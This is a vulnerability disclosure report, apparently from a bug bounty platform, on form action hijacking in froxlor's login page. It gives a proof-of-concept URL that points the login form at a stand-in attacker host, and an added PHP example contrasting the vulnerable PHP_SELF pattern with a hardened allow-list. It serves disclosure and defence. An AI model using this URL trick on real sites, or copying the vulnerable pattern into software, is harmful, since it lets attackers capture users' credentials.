External Control of File Name or Path in froxlor/froxlor

Valid

Reported on Aug 25th 2021


✍️ Description

By modifying the login page URL, the login form's POST request can be hijacked so that the credentials are sent to an external website.

🕵️‍♂️ Proof of Concept

Change the login page URL to:

https://mydomain.com/index.php/evilsite.com

The form action in the rendered page then becomes:

<section class="loginsec">
    <form method="post" action="evilsite.com" enctype="application/x-www-form-urlencoded">
        <input type="hidden" name="script" value="" />
        <input type="hidden" name="qrystr" value="" />

💥 Impact

Form action hijacking vulnerabilities arise when an application places user-supplied input into the action URL of an HTML form. An attacker can use this vulnerability to construct a URL that, if visited by another application user, will modify the action URL of a form to point to the attacker's server. If a user submits the form then its contents, including any input from the victim user, will be delivered directly to the attacker.
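
The pattern behind this class of bug and one hardened alternative, as an added PHP example (not froxlor's code or the merged fix). It assumes the action is derived from `$_SERVER['PHP_SELF']`; the function names, allow-list and request values are constructed for illustration.

```php
<?php
// Added example, not froxlor's code. Names and the allow-list are hypothetical.

// Constructed request data for the proof-of-concept URL, as PHP typically
// populates it when extra path info follows the script name.
$server = [
    'SCRIPT_NAME' => '/index.php',
    'PATH_INFO'   => '/evilsite.com',
    'PHP_SELF'    => '/index.php/evilsite.com',
];

// Assumed vulnerable pattern: PHP_SELF carries the client-controlled
// PATH_INFO suffix, so its last segment is whatever the URL ended with.
function action_from_php_self(array $server): string
{
    return basename($server['PHP_SELF']);
}

// Hardened pattern: use SCRIPT_NAME (no PATH_INFO), accept it only if it is
// a known entry point, and otherwise fall back to a fixed default.
function action_from_allow_list(array $server, array $allowed = ['index.php']): string
{
    $script = basename($server['SCRIPT_NAME'] ?? '');
    return in_array($script, $allowed, true) ? $script : $allowed[0];
}

function render_form(string $action): string
{
    // Escaping stops attribute break-out; it does not make a
    // request-derived value a trustworthy destination.
    return sprintf(
        '<form method="post" action="%s" enctype="application/x-www-form-urlencoded">',
        htmlspecialchars($action, ENT_QUOTES, 'UTF-8')
    );
}

echo render_form(action_from_php_self($server)), PHP_EOL;
echo render_form(action_from_allow_list($server)), PHP_EOL;

// Regression check: the hardened action must not follow the path suffix.
foreach (['/evilsite.com', '/a/b.php', ''] as $suffix) {
    $req = ['SCRIPT_NAME' => '/index.php', 'PHP_SELF' => '/index.php' . $suffix];
    if (action_from_allow_list($req) !== 'index.php') {
        throw new RuntimeException("form action followed path suffix: $suffix");
    }
}
```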

Occurrences

We have contacted a member of the froxlor team and are waiting to hear back (3 months ago)
froxlor/froxlor maintainer confirmed that a fix has been merged on 5d375b (3 months ago)
The fix bounty has been dropped